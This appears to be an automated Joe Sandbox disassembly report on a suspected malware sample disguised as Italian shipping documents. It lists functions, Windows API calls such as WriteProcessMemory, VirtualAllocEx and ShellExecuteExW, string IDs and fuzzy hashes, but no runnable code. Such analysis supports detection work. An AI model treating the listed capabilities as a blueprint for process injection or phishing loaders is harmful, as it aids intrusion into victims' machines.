                          • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                        • __getptd.LIBCMT ref: 00417826
                        • __amsg_exit.LIBCMT ref: 00417834
                        • __lock.LIBCMT ref: 00417844
                        • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                        • String ID:
                        • API String ID: 938513278-0
                        • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                        • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                        • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                        • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                        Function 00413D0E Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                        • ___set_flsgetvalue.LIBCMT ref: 00413D20
                          • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                          • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                        • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                          • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                        • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                        • ExitThread.KERNEL32 ref: 00413D4E
                        • GetCurrentThreadId.KERNEL32 ref: 00413D54
                        • __freefls@4.LIBCMT ref: 00413D74
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                        • String ID:
                        • API String ID: 2403457894-0
                        • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                        • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                        • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                        • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                        Function 004151AF Relevance: 7.5, APIs: 5, Instructions: 22threadCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                        • ___set_flsgetvalue.LIBCMT ref: 004151C0
                          • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                          • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                        • ___fls_getvalue@4.LIBCMT ref: 004151CB
                          • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                        • ___fls_setvalue@8.LIBCMT ref: 004151DD
                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                        • ExitThread.KERNEL32 ref: 004151ED
                        • __freefls@4.LIBCMT ref: 00415209
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                        • String ID:
                        • API String ID: 4247068974-0
                        • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                        • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                        • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                        • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                        Function 004624C5 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 409COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID:
                        • String ID: 5$8$^
                        • API String ID: 0-3622883839
                        • Opcode ID: 5b0bf54134f80cff9ca6ce4a8dff4b23300e7e002ba4f74be1d0103a91d53083
                        • Instruction ID: 6ee989b57c56cc683e8081b45a60e8d88641feefa2b309a8211b066407c3f2e5
                        • Opcode Fuzzy Hash: 5b0bf54134f80cff9ca6ce4a8dff4b23300e7e002ba4f74be1d0103a91d53083
                        • Instruction Fuzzy Hash: 82F1B4B1D00649AACB24CFA9C940AEEFBF4EF84300F14856FE455E7351E3B89A45CB56
                        Function 0044F405 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 302COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID:
                        • String ID: )$U$\
                        • API String ID: 0-3705770531
                        • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                        • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                        • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                        • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                        Function 0046E48D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263comCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                        • CoInitialize.OLE32(00000000), ref: 0046E505
                        • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                        • CoUninitialize.OLE32 ref: 0046E53D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                        • String ID: .lnk
                        • API String ID: 886957087-24824748
                        • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                        • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                        • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                        • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                        Function 0046A6E1 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 241COMMON
                        Download Yara Rule
                        Strings
                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                        • API String ID: 708495834-557222456
                        • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                        • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                        • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                        • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                        Function 0043659E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                          • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                          • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                          • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                          • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                        • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                        • String ID: @
                        • API String ID: 4150878124-2766056989
                        • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                        • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                        • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                        • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                        Function 0044F137 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 161COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: _memmove
                        • String ID: \$]$h
                        • API String ID: 4104443479-3262404753
                        • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                        • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                        • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                        • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                        Function 00457C53 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 158COMMON
                        Download Yara Rule
                        APIs
                        • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                        • CloseHandle.KERNEL32(?), ref: 00457E09
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                        • String ID: <$@
                        • API String ID: 2417854910-1426351568
                        • Opcode ID: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                        • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                        • Opcode Fuzzy Hash: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                        • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                        Function 0044A856 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122networkCOMMON
                        Download Yara Rule
                        APIs
                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                          • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                        • String ID:
                        • API String ID: 3705125965-3916222277
                        • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                        • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                        • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                        • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                        Function 0045FA41 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetMenuItemInfoW.USER32 ref: 0045FAC4
                        • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                        • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Menu$Delete$InfoItem
                        • String ID: 0
                        • API String ID: 135850232-4108050209
                        • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                        • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                        • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                        • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                        Function 004507B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                        Download Yara Rule
                        APIs
                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                        • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Window$Long
                        • String ID: SysTreeView32
                        • API String ID: 847901565-1698111956
                        • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                        • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                        • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                        • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                        Function 00434B02 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 108libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNEL32(?), ref: 00434B10
                        • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                        • FreeLibrary.KERNEL32(?), ref: 00434B9F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Library$AddressFreeLoadProc
                        • String ID: AU3_GetPluginDetails
                        • API String ID: 145871493-4132174516
                        • Opcode ID: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                        • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                        • Opcode Fuzzy Hash: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                        • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                        Function 00450D6B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
